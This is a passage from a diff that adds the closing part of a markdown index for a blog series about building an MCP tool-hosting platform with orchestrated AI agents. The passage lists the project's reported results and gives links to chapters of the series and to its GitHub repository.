+- When to trust AI output and when to validate carefully
+- How to orchestrate AI agents for complex projects
+- The skill shift from "writing code" to "validating systems"
+
+---
+
+## The Result
+
+After 12 days and 86 commits:
+
+- ✅ Full-stack platform deployed to production
+- ✅ Working end-to-end MCP tool calling
+- ✅ 51 automated tests passing
+- ✅ Security hardened through multi-agent review
+- ✅ ~3,400 lines of production-quality code
+- ✅ Complete methodology documented
+
+**Live**: [GitHub Repository](https://github.com/zenchantlive/catwalk)
+
+---
+
+## Start Reading
+
+**New to this project?** Start with [Part 1: Genesis](01-genesis-building-vercel-for-mcp.md)
+
+**Want the technical heart?** Jump to [Part 5: Streamable HTTP](05-streamable-http-mcp-machines.md)
+
+**Interested in AI methodology?** Read [Part 9: Reflections](09-reflections-ai-orchestration.md)
+
+---
+
+**Questions? Feedback?** Open an issue on [GitHub](https://github.com/zenchantlive/catwalk/issues)
+
+**Want to build your own AI-orchestrated project?** This series is your guide. 🚀